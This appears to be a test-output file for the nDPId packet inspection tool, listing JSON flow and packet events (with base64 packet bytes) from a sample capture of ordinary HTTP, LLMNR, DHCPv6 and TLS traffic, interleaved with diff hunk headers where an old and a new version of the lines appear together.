00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1121,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414404,"flow_last_seen":1470104414408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1470104414408,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"dl-obs.official.line.naver.jp","url":"dl-obs.official.line.naver.jp\/r\/talk\/m\/4697716971500\/preview","code":0,"content_type":"","user_agent":"DESKTOP:MAC:10.10.5-YOSEMITE(4.7.2)"}}
00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1122,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414404,"flow_last_seen":1470104414408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1470104414408,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"dl-obs.official.line.naver.jp","url":"dl-obs.official.line.naver.jp\/r\/talk\/m\/4697716954688\/preview","code":0,"content_type":"","user_agent":"DESKTOP:MAC:10.10.5-YOSEMITE(4.7.2)"}}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414404,"flow_last_seen":1470104414404,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104414404,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1470104414404,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104414404,"pkt":"TF4M6gNlYMVHBbyMCABFAABA+kNAAEAGXi3AqAUQy0VRSdF7AFCoMQrOAAAAALAC\/\/8cMAAAAgQFtAEDAwUBAQgKGg+ZqwAAAAAEAgAA"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1116,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414404,"flow_last_seen":1470104414404,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104414404,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1116,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1470104414404,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104414404,"pkt":"TF4M6gNlYMVHBbyMCABFAABAQJ1AAEAGF9TAqAUQy0VRSdF8AFD2CJDQAAAAALAC\/\/9IVAAAAgQFtAEDAwUBAQgKGg+ZrAAAAAAEAgAA"}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1117,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1470104414407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1470104414407,"pkt":"ABxCjnAxTF4M6gNlCABFAAA8AABAADsGXXXLRVFJwKgFEABQ0Xu\/8FK8qDEKz6AScSAwjAAAAgQFtAQCCAobhF1GGg+ZqwEDAwU="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1118,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1470104414407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414407,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0pGZAAEAGtBbAqAUQy0VRSdF7AFCoMQrPv\/BSvYAQEBXAXgAAAQEIChoPma4bhF1G"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1119,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":2,"flow_last_seen":1470104414407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1470104414407,"pkt":"ABxCjnAxTF4M6gNlCABFAAA8AABAADsGXXXLRVFJwKgFEABQ0Xzxz9ee9giQ0aAScSCl7QAAAgQFtAQCCAobhF1HGg+ZrAEDAwU="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":3,"flow_last_seen":1470104414407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414407,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0fmZAAEAG2hbAqAUQy0VRSdF8AFD2CJDR8c\/Xn4AQEBU1wQAAAQEIChoPma4bhF1H"}
00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1121,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414404,"flow_last_seen":1470104414408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1470104414408,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"dl-obs.official.line.naver.jp","url":"dl-obs.official.line.naver.jp\/r\/talk\/m\/4697716971500\/preview","code":0,"content_type":"","user_agent":"DESKTOP:MAC:10.10.5-YOSEMITE(4.7.2)"}}
00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1122,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414404,"flow_last_seen":1470104414408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1470104414408,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"dl-obs.official.line.naver.jp","url":"dl-obs.official.line.naver.jp\/r\/talk\/m\/4697716954688\/preview","code":0,"content_type":"","user_agent":"DESKTOP:MAC:10.10.5-YOSEMITE(4.7.2)"}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1171,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1470104416855,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104416855,"pkt":"AQBeAAD8uKxvwfbSCABFAAA3J2UAAAERi4vAqGUh4AAA\/PVmFOsAI\/xOWbQAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"}
00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1171,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
@@ -472,10 +472,10 @@
00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":2,"flow_last_seen":1470104416958,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104416958,"pkt":"AQBeAAD8uKxvwfbSCABFAAA3J2cAAAERi4nAqGUh4AAA\/PVmFOsAI\/xOWbQAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1174,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":2,"flow_last_seen":1470104416959,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104416959,"pkt":"AQBeAAD8cPGh+Cr9CABFAAA3CxIAAAERB\/fAqAUJ4AAA\/PVmFOsAI1xnWbQAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1200,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104419061,"flow_last_seen":1470104419061,"flow_idle_time":7440000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":101,"flow_avg_l4_payload_len":101,"midstream":1,"thread_ts_msec":1470104419061,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1200,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1470104419061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1470104419061,"pkt":"ABxCjnAxTF4M6gNlCABFAACZI1ZAAFgGw0IfDVcBwKgFEAG70UpuASLeX6ylxYAYAJ4ivgAAAQEICp0wiHcaDujhFwMDAGCI1MTiGjgHtvACFdJlLWU4Nw2FMu4PdWcz\/2qZKGCdERXjWW+\/VFKnsNQj6agVS5OakWCEMlC4HzCUNHzoAeDAfMWTlTRJFP0wq7r0D4aYTL9j7QTQTC0wsTFBdRQvfIs="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":1470104419061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104419061,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0qwZAAEAGU\/fAqAUQHw1XAdFKAbtfrKXFbgEjQ4AQD\/zVtQAAAQEIChoPq9GdMIh3"}
02035{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1470104419103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1223,"pkt_l4_len":1189,"thread_ts_msec":1470104419103,"pkt":"TF4M6gNlYMVHBbyMCABFAAS5ltxAAEAGY5zAqAUQHw1XAdFKAbtfrKXFbgEjQ4AYEACgIgAAAQEIChoPq\/udMIh3FwMDBIB0Q7hbcg3gGVYTMrb0Tw1ukR9UWDAVBAtnbbvKcZJuPb4APoiSa8Bqy8MZbEZYSbOXsH6FRBiOXgQXR63aPZc\/hbpffrKKNOrKdGE28RcTBjPmf5KXRAiotID0urgwFwaynRtP+jd28hq9wG7na42EI3czkeebegJ7Hfqlh5eZl4Vnp3HXS2vj3pkfDjxrZNE1RoOaEkc+zGmnNTU0pYUiN9oTvOxyCvhMy7fmLDw2wNiIlnohv3qHV8HD46rBGW31Av40VD\/q5qbqM\/qLmRKpL9p4844aHi0K6ueq0ZT6TMs6WDgIPrhbY3XHMcMOatt\/ady86wYTLrgpENkDcutzNwuaAPbT+EcTuorA74M2F\/nruolPShszJ2UqNq\/Kb53\/C73zGS79aq0H4GQVpGLbiCEPEKZelcdnRDWAFlFD1De4jjpnV6eSGf0bsjdHkkSXOtKgo9fVDPltH7d4AfIVmOrYXnB4XaFQ7sqjoXmFP04T\/UZ9alTbXHhky07Nt8ZpZ+IsF6Mw7DMnQdlgdIAyTuc7JHD\/Ok90niXYhq4NzT+82L50EtJnB33J3Hke7h3o3sgTaNpQXdNfC2YJvtxEi753mIKXu+MBZEwy9ZPQaN73qXC\/OuiBukllab3YR64oWLHBb9R9Cob1usnX3xEd01XJDB4TsRXGV\/R4o29fk4M2bIFdhCdZZxbrlSOnlAJcyXFDgvxxi2r1OxtCdDnw2p7YYdruVdteggpuz3KWAxQf0xX6bEO4WvjFfVmqekT\/CcvxbftJ0OPvtUNbAmIMdzByrRWcH1KlE+Vp1L\/hC9R9Bs3ZcFYrVLmIjOjuR6dZM0gvCNqW+59Duv8pYvq5EskshSuV+VZXQgSphi1zRgwOIMQ80OXjfOd22IffY4fDrlfus1x+wyxpIvDhkq\/80yQo8lPgVUp5LrkwFv8MzfZEG9QVTX5NzJ4ld3sKhU430m+NFzViUapPGRtbxukso3sgavTRg8JkLGw0Wu4KmdOfCPycSYYMtX8wKXnZK3VItDYdup7QRof+kXjKmph54jb48oKmkP1E+fFyArD7x9lonAQ9p5aPKUKzZSnZg3s2QTvBrHxZHDUUh\/GiPymMFletcBA29rvJBTe5sh56A9o976AcTzrk2LtWjfifRRuCloaa709oX8j2NbS2T6fnPB7k5F2xcXniikiRI4m5Wr1rKwzBOYPeISDSO0Iag3\/qLAF4MYdHlpTmWSwUwPziE1P5k6JOH5aZI8e0Q7f0ZxLoqs1jZ2iVmphMqYY9PJIQOnlyUxXdzMxGkRPxC7nkXRnaVTa1Jic4cqbBA0o4E1jc9+EGwh1+8Xvom\/2X552fI1RWakGy58LTHqErwe5sAM83mOIz30W4kVNgLTYM0IjNdR3qa8WogmdKAZ3AFlzKnQVYuwcLo1Z88j+7WQ1aASRKMsinZvu7EijyrunTKJR37AcZ28FtpqOjfm2723l5Y4Ue3NHUMyl8JxA0FHtAmvTh7ijEjAuZW2F1kyMK9I8qLUk6J5HZwZruiDHIIjM="}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1200,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104419061,"flow_last_seen":1470104419061,"flow_idle_time":7560000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":101,"flow_avg_l4_payload_len":101,"midstream":1,"thread_ts_msec":1470104419061,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1200,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1470104419061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1470104419061,"pkt":"ABxCjnAxTF4M6gNlCABFAACZI1ZAAFgGw0IfDVcBwKgFEAG70UpuASLeX6ylxYAYAJ4ivgAAAQEICp0wiHcaDujhFwMDAGCI1MTiGjgHtvACFdJlLWU4Nw2FMu4PdWcz\/2qZKGCdERXjWW+\/VFKnsNQj6agVS5OakWCEMlC4HzCUNHzoAeDAfMWTlTRJFP0wq7r0D4aYTL9j7QTQTC0wsTFBdRQvfIs="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":1470104419061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104419061,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0qwZAAEAGU\/fAqAUQHw1XAdFKAbtfrKXFbgEjQ4AQD\/zVtQAAAQEIChoPq9GdMIh3"}
02035{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1470104419103,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1223,"pkt_l4_len":1189,"thread_ts_msec":1470104419103,"pkt":"TF4M6gNlYMVHBbyMCABFAAS5ltxAAEAGY5zAqAUQHw1XAdFKAbtfrKXFbgEjQ4AYEACgIgAAAQEIChoPq\/udMIh3FwMDBIB0Q7hbcg3gGVYTMrb0Tw1ukR9UWDAVBAtnbbvKcZJuPb4APoiSa8Bqy8MZbEZYSbOXsH6FRBiOXgQXR63aPZc\/hbpffrKKNOrKdGE28RcTBjPmf5KXRAiotID0urgwFwaynRtP+jd28hq9wG7na42EI3czkeebegJ7Hfqlh5eZl4Vnp3HXS2vj3pkfDjxrZNE1RoOaEkc+zGmnNTU0pYUiN9oTvOxyCvhMy7fmLDw2wNiIlnohv3qHV8HD46rBGW31Av40VD\/q5qbqM\/qLmRKpL9p4844aHi0K6ueq0ZT6TMs6WDgIPrhbY3XHMcMOatt\/ady86wYTLrgpENkDcutzNwuaAPbT+EcTuorA74M2F\/nruolPShszJ2UqNq\/Kb53\/C73zGS79aq0H4GQVpGLbiCEPEKZelcdnRDWAFlFD1De4jjpnV6eSGf0bsjdHkkSXOtKgo9fVDPltH7d4AfIVmOrYXnB4XaFQ7sqjoXmFP04T\/UZ9alTbXHhky07Nt8ZpZ+IsF6Mw7DMnQdlgdIAyTuc7JHD\/Ok90niXYhq4NzT+82L50EtJnB33J3Hke7h3o3sgTaNpQXdNfC2YJvtxEi753mIKXu+MBZEwy9ZPQaN73qXC\/OuiBukllab3YR64oWLHBb9R9Cob1usnX3xEd01XJDB4TsRXGV\/R4o29fk4M2bIFdhCdZZxbrlSOnlAJcyXFDgvxxi2r1OxtCdDnw2p7YYdruVdteggpuz3KWAxQf0xX6bEO4WvjFfVmqekT\/CcvxbftJ0OPvtUNbAmIMdzByrRWcH1KlE+Vp1L\/hC9R9Bs3ZcFYrVLmIjOjuR6dZM0gvCNqW+59Duv8pYvq5EskshSuV+VZXQgSphi1zRgwOIMQ80OXjfOd22IffY4fDrlfus1x+wyxpIvDhkq\/80yQo8lPgVUp5LrkwFv8MzfZEG9QVTX5NzJ4ld3sKhU430m+NFzViUapPGRtbxukso3sgavTRg8JkLGw0Wu4KmdOfCPycSYYMtX8wKXnZK3VItDYdup7QRof+kXjKmph54jb48oKmkP1E+fFyArD7x9lonAQ9p5aPKUKzZSnZg3s2QTvBrHxZHDUUh\/GiPymMFletcBA29rvJBTe5sh56A9o976AcTzrk2LtWjfifRRuCloaa709oX8j2NbS2T6fnPB7k5F2xcXniikiRI4m5Wr1rKwzBOYPeISDSO0Iag3\/qLAF4MYdHlpTmWSwUwPziE1P5k6JOH5aZI8e0Q7f0ZxLoqs1jZ2iVmphMqYY9PJIQOnlyUxXdzMxGkRPxC7nkXRnaVTa1Jic4cqbBA0o4E1jc9+EGwh1+8Xvom\/2X552fI1RWakGy58LTHqErwe5sAM83mOIz30W4kVNgLTYM0IjNdR3qa8WogmdKAZ3AFlzKnQVYuwcLo1Z88j+7WQ1aASRKMsinZvu7EijyrunTKJR37AcZ28FtpqOjfm2723l5Y4Ue3NHUMyl8JxA0FHtAmvTh7ijEjAuZW2F1kyMK9I8qLUk6J5HZwZruiDHIIjM="}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1231,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104420438,"flow_last_seen":1470104420438,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1470104420438,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":61172,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1470104420438,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":87,"pkt_l4_len":33,"thread_ts_msec":1470104420438,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACERAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD7vQU6wAh24kTvAAAAAEAAAAAAAAHc29udXNhdgAAAQAB"}
00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1231,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104420438,"flow_last_seen":1470104420438,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1470104420438,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":61172,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
@@ -488,18 +488,18 @@
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1270,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104423202,"flow_last_seen":1470104423202,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104423202,"l3_proto":"ip6","src_ip":"fe80::f65c:89ff:fe89:e607","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1270,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1470104423202,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104423202,"pkt":"MzMAAQAC9FyJieYHht1gD8\/5ACwRAf6AAAAAAAAA9lyJ\/\/6J5gf\/AgAAAAAAAAAAAAAAAQACAiICIwAsGIELuXYqAAEADgABAAEeo3uS9FyJieYHAAYABAAXABgACAAC\/\/8="}
00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1270,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104423202,"flow_last_seen":1470104423202,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104423202,"l3_proto":"ip6","src_ip":"fe80::f65c:89ff:fe89:e607","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104423246,"flow_last_seen":1470104423246,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104423246,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1470104423246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104423246,"pkt":"ABAj4ACgYMVHBbyMCABFAABAVdFAAEAG6zrAqAUQwKhzS9F9AbtloPklAAAAALAC\/\/81IwAAAgQFtAEDAwUBAQgKGg+8HwAAAAAEAgAA"}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1470104423247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104423247,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70X2C0DtLZaD5JoASFtBuaQAAAgQFtAEBBAIBAwMH"}
